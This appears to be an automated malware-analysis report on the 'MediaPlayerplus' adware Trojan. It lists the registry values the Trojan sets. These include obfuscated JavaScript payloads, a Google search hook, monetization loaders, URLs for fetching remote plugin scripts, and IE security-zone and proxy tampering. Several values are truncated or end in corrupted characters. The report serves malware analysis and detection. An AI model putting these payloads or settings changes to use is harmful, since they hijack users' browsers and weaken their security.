"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\MPlayerplus_01\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/47.js"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/17.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MDcxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjFhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVhNGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0NjRjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMWMxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIwMzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YTJkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0MTdmMDc=', 'zmrnudfncu'); }"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\MPlayerplus_01\Plugins\281]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seÃÂ¥ƒ)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/221.js"
[HKCU\Software\MPlayerplus_01\Plugins\260]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMWYxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAwNGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMDAxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEyYzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1MzczZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNzBjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2MjkzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZDFiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/220.js"
[HKCU\Software\MPlayerplus_01\Code]
"NewTabJavaScript" = ""
[HKCU\Software\MPlayerplus_01\Plugins\46]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/46.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"
[HKCU\Software\MPlayerplus_01\Plugins\289]
"Name" = "covus_logos_m"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\MPlayerplus_01\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIy)"
[HKCU\Software\MPlayerplus_01\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA3ODU2NTA0NjU0NTQwZDE4MWIxYjI3MDQxYzQ0NGU1NjQ3MDQxYjFmMDI0YzVmNDkxNzEyMGIwZjBlMDgxYTEzNDE0YjE1NTgwNDA3MGUwNjEzMWYxODAyNWExODAwMTg0MDE4MDcxNDVmMTA0NzQ0NTQ1NTBkMGY1ZDI5MmYyNTI2MzkzNjNmM2QyMjM2MzMyMjM5MzEyZTMxMjkyMTJmMzczMjJmMzUyMTM0M2EyNTJiMzQyZDU5MWM0ODFlMDU1YTFjMDYwZjRmNDc0MDVmNDA1MDAwMTQxYjU2MmQyOTMzMzQzYjI1MzYzZTI2MmYzNzI0MmYyNzI0MjYzYTIyMmUyNjM3MjkyZjQwMDcwZjE2MTgwYTA2MWIxMjRkMzkyYjM1MzcyMzNjMzgyMDNmMzQyMzI2MjkyYzIyM2MzZjMzM2EzYzIzMjYyOTMwM2YyYTM5MmQzZjM0MzkyYjU0NDk2NjRmNGI1MjU2NTIwZTAwMDIxNTFmM2ExOTFlNTQ0YTQ2NTYxZTExMTgxZjE4NDg1OTVmMDUxMDE4MDYwZDBjMDMxNzQ3NWQwNzVhMTcwZTBkMDIwYTFiMWUxNDQ4MWExMzExNDMxYzFlMTA1OTA2NTU0NjQ3NWMwZTBiNDQyZDI5MzMzNDNiMjUzNjNlMjYyZjM3MjQyZjIzMmMyMjIwMjIyYjJlMzYyOTIzMzMzNjI5MmMyODMwMzQ1ZDFhNWUwYzA3NDkxNTA1MGI1NjQzNDY0OTUyNTIxMzFkMTg1MjM0MmQzNTIyMjkyNzI1MzcyNTJiMmUyMDI5MzEzNjI0MjkyYjJkMjIyZTJkMjk1NjE1MGQwNTExMDkwMjAyMTY0YjJmMzkzNzI0MmEzZjNjMzkzYjMyMzUzNDJiM2YyYjNmM2IyYTNlM2EzNTM0MmIyMzM2MjkzZDM0M2IzMjJmMzk1NjVhNmY0YzRmNGI1MjU0MDAwYTAxMTEw)"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/242.js"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/35.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\MPlayerplus_01\Plugins\192]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3YTYzNGMxYzA2MTkwNTNlMTQwNjUyNTA0ZTU2MWExOTAxMWI1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjAyMWEwMDAyMWUyMDE5MGE0ODRhNGE0YzFjMDYxOTA1MTg1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjFhMDIwMTE1MDQxYjIyMDI0ODRhNGE1ZjRkNDA0MTdmNGI0NjRhNTA0ODE4MTEwMDE5MWMwODA3MDY1MjUwNGUyZjUwMGMxMTE4NDQzNzVjNjA0ZTU0NTI0ZDU3MDIwODA2MTkwNDBiM2UyMTRmNGY0YjQ0MWQxOTA0MGExYjA1NDMyYTE5MTAxMDQxNWQ1ZTQ0MGE1YzQ1NWI1ZTRhNGQ0YTE1NTQ1NTFkMDAwOTBhMDMwMzAyMGIwNjJkMWUwMDA5MGYwZTU3NTA0ZTUzMmQzMjM2MzkyOTM5MjMzODI3MzAzNzNmMmEyZTNlM2UzNTI0MmEzMTM2MzIyNjNlMjQzNTM5MmUzMTJiNTU0MTU1NGMwNzBlMTQwNTAwMWExMzAwMTA0YzVjNGE1NzM1MzEzNzIwMjIyNjM4MzQyMzM0MmYzYzJiMzMzZDI1MzQyODJiM2QyZjMxMmI1NTEwNGU0OTZjMTc=', 'jpjntrmukf'); }"
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2NDdlNTcxZTFhMGMxMzJmMDAxODRjNGQ1NTU0MDYwYzE3MGE0ODViNDExMjBkMDI1YzU2MDYxNDE1MTUwOTEyMGMxNzQwMWIwYzE3NWQwMzA3MTMxMjEzMWE1NzBhMTQxODExMGQwMzJhMDUxZTE5MTExMTVkMWQwMDFkMmEwNTFlMGEwODI1MDEwMDBmMDUwMTEzMWM1NjA5MDk0ZDA0MDcxMzQ4M2EzYTNkMTAzNTM2MzU1ZjM4MzEyNzFkMzUwOTFkNDEzOTA0M2UwNjM4MmExYjU3MzUyNjM1NGI0NDMxNTAxZDBkMDExMzE2NDkzMTI4MzYyNDIxMmIzMDI4M2IzMDJiMjUyYTMzMzYyYzI2MzQzNjMxMmEyODI2MjMyYzI3MmEzZTJkMmI0ODE2MDUwNjAwMTkwZTFmNGYyYjMxMzQyNzM5M2QyYjMxMzMzNjMxM2MyODM0MjYzZTI3MmQzYjNmMzEzMTI4NTc1YTY0NzE0MTEyMDYwMDFlMDQyMDA0MDI1YTU5NWE1MDFjMWEwMzA1MDU1NDU3NGMxZjBhMDA1YzU5MTAxODA5MTkwNDFmMGIxNTQwMTQxYTFiNDEwZjBhMWUxNTExMWE1ODFjMTgwNDFkMDAwZTJkMDcxZTE2MDcxZDQxMTEwZDEwMmQwNzFlMDUxZTI5MWQwYzAyMDgwNjExMWM1OTFmMDU1MTA4MGExZTRmMzgzYTMyMDYzOTJhMzk1MjM1MzYyNTFkM2ExZjExNWQzNTA5MzMwMTNhMmExNDQxMzkzYTM5NDY0OTM2NTIxZDAyMTcxZjBhNDUzYzI1MzEyNjIxMjQyNjI0MjczYzI2MjgyZDMxMzYyMzMwMzgyYTNkMjcyNTIxMjEyYzI4M2MzMjMxMjc0NTFiMDIwNDAwMTYxODEzNTMyNzNjMzkyMDNiM2QyNDI3M2YyYTNkMzEyNTMzMjQzZTI4M2IzNzIzM2Qz)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\MPlayerplus_01\Plugins\262]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/262.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\MPlayerplus_01\Plugins\269]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Manifest]
"Name" = "MediaPlayerplus"
[HKCU\Software\MPlayerplus_01\Plugins\260]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Installer]
"osName" = "XP32"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\286]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;}㤰-"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveu-"
[HKCU\Software\MPlayerplus_01\Plugins\275]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/275.js"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/38.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherId" = "21636"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\MPlayerplus_01\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/104.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/211.js"
[HKCU\Software\MPlayerplus_01\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2MTRmNDU1OTUwNDQwNjE1MDUxYjNlMWQwOTViNGE0NjRjMDkwNTFmMWI1NTRhNTYxNDU3MWYxMDE1MGYxZTA5MDQxNTQ0MDI1YjU5NWYwODA3MDAxMDFkMTYxNDAxMGYwNTQ1MDUwYTExNTYwMzA1MWMwODAxMWYxODQwMDYxNjFlMTIwYjE5MDUxZTBhMDMwZjBhNWYxMDVjNGUxMjFmMTMwNTE2NTcxYTE1NTEwMDE3MGQzNDA2MDE0NDQxNTc1YTU0NTcxODFlMGQwNDFmMTYzOTA3MDU0YzM0MzQyYzM3MzYyMzM1M2MyODM1MmUzOTMwMjAyMTI0MjMyMDI1MzQyZjM0M2MzMDNiMmYyZjJhM2UyZTRkMTgwZDE3MTgxZTAyNTMzZTJlMjgzOTIwMzYyYTIyMmYyYTI0MjMzNDJhM2YzNTI2M2UyNzIzMjQyZTM0NDk0MzZmNTk1MDQ2NGU0MzE5MWYxZjFmMTYyYzAyMGE0YzViNTE0OTAzMWIxMTA5MDM1YzQxNGUxNTVhMWExZTAxMWQwNTAwMGYwZDQ1MGY1ZTU3NGIxYTFjMDkxYjA1MTcxOTA0MDExMTU3MWUwMzFhNGUwMjA4MTkwNjE1MGQwMzQ5MGQwZTFmMWYwZTE3MTEwYzExMGEwNDEyNWUxZDU5NDAwNjBkMDgwYzFkNGYxYjE4NTQwZTAzMWYyZjBmMGE1YzQwNWE1ZjVhNDMwYTA1MDQwZjA3MTczNDAyMGI1ODI2MmYyNTNjMmUyMjM4MzkyNjIxM2MyMjM5MmIzOTI1MmUyNTJiMjAzZDJmMzUzYjIzMmUyMjJmMzAzYTVmMDMwNDFjMDAxZjBmNTYzMDNhM2EyMjI5M2QzMjIzMjIyZjJhMzcyNjMxMzYzZTNlM2YyYTI2MmEzYTI2NTI0YTY0NDE1MTRiNGI0ZDE1MTUwNTAxMDcwZjM4MGY0OTU1NDU0YjQ3NTU2)"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"Version" = "12"0?0:>0>10?0>
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\MPlayerplus_01\Plugins\41]
[HKCU\Software\MPlayerplus_01\Plugins\40]
[HKCU\Software\MPlayerplus_01\Plugins\2]
[HKCU\Software\MPlayerplus_01\Plugins\28]
[HKCU\Software\MPlayerplus_01\Plugins\45]
[HKCU\Software\MPlayerplus_01\Plugins\44]
[HKCU\Software\MPlayerplus_01\Plugins\47]
[HKCU\Software\MPlayerplus_01\Plugins\46]
[HKCU\Software\MPlayerplus_01\Plugins\42]
[HKCU\Software\MPlayerplus_01\Plugins\22]
[HKCU\Software\MPlayerplus_01\Plugins\21]
[HKCU\Software\MPlayerplus_01\Plugins\190]
[HKCU\Software\MPlayerplus_01\Plugins\191]
[HKCU\Software\MPlayerplus_01\Plugins\1]
[HKCU\Software\MPlayerplus_01\Plugins\220]
[HKCU\Software\MPlayerplus_01\Plugins\221]
[HKCU\Software\MPlayerplus_01\Plugins\226]
[HKCU\Software\MPlayerplus_01\Plugins]
[HKCU\Software\MPlayerplus_01\Plugins\7]
[HKCU\Software\MPlayerplus_01\Plugins\9]
[HKCU\Software\MPlayerplus_01\Plugins\207]
[HKCU\Software\MPlayerplus_01\Plugins\253]
[HKCU\Software\MPlayerplus_01\Plugins\104]
[HKCU\Software\MPlayerplus_01\Plugins\103]
[HKCU\Software\MPlayerplus_01\Plugins\102]
[HKCU\Software\MPlayerplus_01\Plugins\195]
[HKCU\Software\MPlayerplus_01\Plugins\38]
[HKCU\Software\MPlayerplus_01\Plugins\39]
[HKCU\Software\MPlayerplus_01\Plugins\72]
[HKCU\Software\MPlayerplus_01\Plugins\78]
[HKCU\Software\MPlayerplus_01\Plugins\184]
[HKCU\Software\MPlayerplus_01\Plugins\183]
[HKCU\Software\MPlayerplus_01\Plugins\182]
[HKCU\Software\MPlayerplus_01\Plugins\36]
[HKCU\Software\MPlayerplus_01\Plugins\35]
[HKCU\Software\MPlayerplus_01\Plugins\64]
[HKCU\Software\MPlayerplus_01\Plugins\233]
[HKCU\Software\MPlayerplus_01\Plugins\37]
[HKCU\Software\MPlayerplus_01\Plugins\211]
[HKCU\Software\MPlayerplus_01\Plugins\242]
[HKCU\Software\MPlayerplus_01\Plugins\244]
[HKCU\Software\MPlayerplus_01\Plugins\246]
[HKCU\Software\MPlayerplus_01\Plugins\177]
[HKCU\Software\MPlayerplus_01\Plugins\43]
[HKCU\Software\MPlayerplus_01\Plugins\91]
[HKCU\Software\MPlayerplus_01\Plugins\155]
[HKCU\Software\MPlayerplus_01\Plugins\94]
[HKCU\Software\MPlayerplus_01\Plugins\13]
[HKCU\Software\MPlayerplus_01\Plugins\3]
[HKCU\Software\MPlayerplus_01\Plugins\17]
[HKCU\Software\MPlayerplus_01\Plugins\14]
[HKCU\Software\MPlayerplus_01\Plugins\93]
[HKCU\Software\MPlayerplus_01\Plugins\4]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process MPlayerplus_01-codedownloader.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\MPlayerplus_01\Plugins\246]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/setup.js"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Installer]
"subid" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\MPlayerplus_01\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el@'"
[HKCU\Software\MPlayerplus_01\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\MPlayerplus_01\Plugins\72]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiValidation.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\44]
"Version" = "6"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderAppUtils.js"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderInfo.js"
[HKCU\Software\MPlayerplus_01\Installer]
"ErrorsDomain" = "http://errors.clientstaticserv.com"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi'"
[HKCU\Software\MPlayerplus_01\Plugins\4]
